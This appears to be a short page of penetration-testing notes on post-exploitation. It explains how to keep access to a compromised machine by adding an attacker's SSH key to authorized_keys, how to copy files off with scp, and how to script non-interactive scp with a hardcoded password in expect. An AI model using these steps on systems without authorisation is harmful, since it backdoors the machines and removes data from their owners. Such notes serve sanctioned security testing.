

Generate Key Pair

if you manage to upload a reverse-shell and get access to the machine you might be able to enter using ssh. Which might give you a better shell and more stability, and all the other features of SSH. Like transferring files.

So, in the /home/user directory you can find the hidden .ssh files by typing ls -la. Then you need to do two things:

Create a new keypair, You do that with:

ssh-keygen -t rsa -C "your_email@example.com"

This will create two files, one called nameOfMyKey and another called nameOfMyKey_pub. The one with the _pub is of course your public key. And the other key is your private.

Add your public key to authorized_keys.

Now you copy the content of nameOfMyKey_pub. On the compromised machine you go to ~/.ssh and then run add the public key to the file authorized_keys. Like this

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDQqlhJKYtL/r9655iwp5TiUM9Khp2DJtsJVW3t5qU765wR5Ni+ALEZYwqxHPNYS/kZ4Vdv..." > authorized_keys

Log in.

ssh -i nameOfMyKey kim@

SCP File Transfer

Copy a file:

scp /path/to/source/file.ext username@

Copy a directory:

scp -r /path/to/source/dir username@

non-interactive SCP

The only reason that a one-liner doesn’t work is because SCP prompts the user for a password, and simply echoing the password and piping it to the command won’t work. The list of commands to build the file looks like this:

echo '#!/usr/bin/expect' > scp.exp
echo 'spawn scp username@ip-addr:/path-to-file out-file' >> scp.exp
echo 'set pass "password"' >> scp.exp
echo 'expect {' >> scp.exp
echo 'password: {send "$pass\r"; exp_continue}' >> scp.exp
echo '}' >> scp.exp

To run this file

expect scp.exp

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